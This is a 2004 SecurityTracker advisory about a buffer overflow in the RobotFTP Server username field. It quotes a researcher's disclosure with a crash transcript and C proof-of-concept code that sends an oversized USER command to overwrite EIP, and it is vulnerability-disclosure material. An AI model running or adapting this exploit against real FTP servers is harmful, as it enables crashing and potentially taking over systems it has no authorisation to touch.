SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   RobotFTP Vendors:   robotftp.com
RobotFTP Server 'user' Buffer Overflow Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1009077
SecurityTracker URL:  http://securitytracker.com/id/1009077
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 16 2004
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.0, 2.0 beta 1
Description:   A buffer overflow vulnerabiity was reported in the RobotFTP server. A remote user can execute arbitrary code on the target system.

gsicht reported that a remote user can supply specially crafted text for the 'user' field to trigger a buffer overflow and execute arbitrary code with the privileges of the FTP service.

A demonstration exploit transcript is provided:

220 Connected to RobotFTP Server
Benutzer (done:(none)): <AA...more than 47 A's...AA>
331 User name OK, send password as PASS
Kennwort:
530 User cannot log in
Anmeldung fehlgeschlagen.
ftp> Ung ltiger Befehl
ftp> user <AA... about 2000 A's ...AA>
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
502 Command not implemented
Anmeldung fehlgeschlagen.
ftp> Ung ltiger Befehl
CRASH!!!!!!
ftp> quit
C:\Dokumente und Einstellungen\Admin\Desktop>

Some demonstration exploit code is provided in the Source Message.

Impact:   A remote user can execute arbitrary code on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.robotftp.com/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  buffer overflow in Robot FTP Server




Application:  Robot FTP Server
              http://www.robotftp.com/
Versions:     1.0/2.0 beta 1 
Platforms:    Windows NT
Bug:          Buffer Overflow
Exploitation: remote
Date:         15 Feb 2004
Author:       gsicht
              e-mail: nothing.king@firemail.de

#######################################################################
1) Introduction
2) Bug
3) The Code
#######################################################################
===============
1) Introduction
===============
Quoute from the Robot ftp's website:
"RobotFTP server is an FTP server that will transform any windows computer into an FTP site and enable distribution of files to co-workers
 or friends.

Robotftp Server is extremely easy to setup and configure. You can create password protected or anonymous accounts, specify folders
 and files that are accessible for each account, and monitor activities of connected users."

#######################################################################
======
2) Bug
======
I found a buffer overflow vulnerability in Robotftp server in the username fiehlt that allowes remote command execution. I only found
 this vulnerability with the windows ftp client. It doesn't work with netcat or telnet.

C:\Dokumente und Einstellungen\Admin\Desktop>ftp localhost

220 Connected to RobotFTP Server
Benutzer (done:(none)): <AA...more than 47 A's...AA>  
331 User name OK, send password as PASS
Kennwort:
530 User cannot log in
Anmeldung fehlgeschlagen.
ftp> user <AA... about 2000 A's ...AA>
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
550 Access is denied
502 Command not implemented
Anmeldung fehlgeschlagen.
CRASH!!!!!!
ftp> quit
C:\Dokumente und Einstellungen\Admin\Desktop>

#######################################################################
===========
3) The Code
===========
/******************************
this is example code for the vulnerability. It uses the windows ftp client to connect to a server
******************************/
#include <stdio.h>

char buffer[2500]; 
char cmd[50];

int main(int argc, char *argv[])
{
	FILE *evil;

	if(argv[1] == NULL)
	{
		printf("Usage: %s [IP]\n\n",argv[0]);
		return 0;
	}

	memset(buffer,0x41,47);
	memcpy(buffer+47,"\r\n",2);
	memcpy(buffer+49,"crash",5);
	memcpy(buffer+54,"\r\n",2);
	memcpy(buffer+56,"USER ",5);
	memset(buffer+61,0x41,1989);
	memset(buffer+61+1989,0x58,4);	// << overwrites the eip with XXXX
	memcpy(buffer+65+1989,"\r\n",2);

	sprintf(cmd,"ftp -s:ftp.txt %s",argv[1]);


	if((evil = fopen("ftp.txt", "a+")) != NULL)
	{
		fputs(buffer, evil);
		fclose(evil);
		printf("- file written!\n");
	}
	else
	{
		fprintf(stderr, "ERROR: couldn't open ftp.txt!\n");
		exit(1);
	}
	system(cmd);

}
/*******************************/
#######################################################################

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC